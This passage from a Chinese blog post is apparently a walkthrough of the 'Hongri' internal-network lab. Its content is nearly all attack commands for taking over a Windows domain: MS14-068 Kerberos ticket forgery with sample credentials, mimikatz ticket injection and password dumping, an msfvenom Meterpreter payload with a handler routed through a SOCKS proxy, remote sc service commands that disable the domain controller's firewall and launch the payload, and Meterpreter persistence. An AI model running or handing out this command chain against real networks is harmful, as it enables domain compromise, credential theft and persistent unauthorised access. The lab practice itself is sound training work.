<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">利用ms14-068伪造票据 </span><br><span class="line">ms14-068.exe -u 域成员名@域名.com -s 域成员sid -d 域控制器ip地址 -p 域成员密码</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ms14-068.exe -u douser@DEMO.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123</span><br></pre></td></tr></table></figure>

<p>运行mimikatz.exe</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">mimikatz # kerberos::purge     //清空当前机器中所有凭证，如果有域成员凭证会影响凭证伪造 </span><br><span class="line">mimikatz # kerberos::list      //查看当前机器凭证 mimikatz # kerberos::ptc &lt;生成的票据文件&gt;    //将票据注入到内存中</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/t7oO5mWGKiv1aqx.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.135.4 lport=6688 -f exe dd.exe</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">upload dd.exe &gt; C:\Users\douser\Desktop</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/7UMdT3A6vNEbft5.png"><br><img src="https://s2.loli.net/2022/05/29/7RlkVIqpCy3Qr5H.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">shell </span><br><span class="line">cd C:\Users\douser\Desktop</span><br></pre></td></tr></table></figure>
<p><img src="https://s2.loli.net/2022/05/29/dWc7aZl5Q9YTHSO.png"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">生成一个msf马 </span><br><span class="line">msfvenom -p windows/meterpreter/bind_tcp lhost=192.168.31.96 lport=6688 -f exe -o dd.exe </span><br><span class="line">监听 </span><br><span class="line">use exploit/multi/handler </span><br><span class="line">set Proxies socks5:192.168.135.4:1080 </span><br><span class="line">set payload windows/meterpreter/bind_tcp </span><br><span class="line">set rhost 192.168.183.130 </span><br><span class="line">set lport 6688 </span><br><span class="line">set AutoRunScript post/windows/manage/migrate </span><br><span class="line">run</span><br></pre></td></tr></table></figure>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">查看域控 </span><br><span class="line">net use \\WIN-ENS2VR5TR3N </span><br><span class="line">dir \\WIN-ENS2VR5TR3N\c$ </span><br><span class="line"></span><br><span class="line">关防火墙 </span><br><span class="line">sc \\WIN-ENS2VR5TR3N create unablefirewall binpath= &quot;netsh advfirewall set allprofiles state off&quot; </span><br><span class="line">sc \\WIN-ENS2VR5TR3N start unablefirewall </span><br><span class="line"></span><br><span class="line">传到域控 </span><br><span class="line">copy dd.exe \\WIN-ENS2VR5TR3N\c$ </span><br><span class="line">sc \\WIN-ENS2VR5TR3N create dshell binpath= &quot;c:\bind.exe&quot; </span><br><span class="line">sc \\WIN-ENS2VR5TR3N start dshell</span><br></pre></td></tr></table></figure>

<p>上线传猕猴桃 执行<br>run persistence -X -i 5 -p 4000 -P windows&#x2F;meterpreter&#x2F;bind_tcp<br>执行猕猴桃，抓密码开3389登录拿下</p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%86%85%E7%BD%91%E9%9D%B6%E5%9C%BA/" rel="tag"># 内网靶场</a>
              <a href="/tags/%E7%BA%A2%E6%97%A5/" rel="tag"># 红日</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/06/02/%E7%BA%A2%E6%97%A5%E4%B8%89/" rel="prev" title="红日三">
      <i class="fa fa-chevron-left"></i> 红日三
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/06/02/%E7%BA%A2%E6%97%A5%E4%BA%94/" rel="next" title="红日五">
      红日五 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%90%AF%E5%8A%A8"><span class="nav-number">1.</span> <span class="nav-text">启动</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#docker%E9%80%83%E9%80%B8"><span class="nav-number">2.</span> <span class="nav-text">docker逃逸</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81"><span class="nav-number">3.</span> <span class="nav-text">权限维持</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E5%B8%B8%E7%94%A8%E5%91%BD%E4%BB%A4"><span class="nav-number">3.1.</span> <span class="nav-text">内网信息收集常用命令</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Lu1i丶"
      src="/images/1.PNG">
  <p class="site-author-name" itemprop="name">Lu1i丶</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">32</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Lu1i丶</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : '2IjWrTCGWIUFwAsamIh2ezIu-gzGzoHsz',
      appKey     : 'EOJr4RJE5lM0E3ryx1vGuAPV',
      placeholder: "Just go go",
      avatar     : 'mm',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : false,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

</body>
</html>
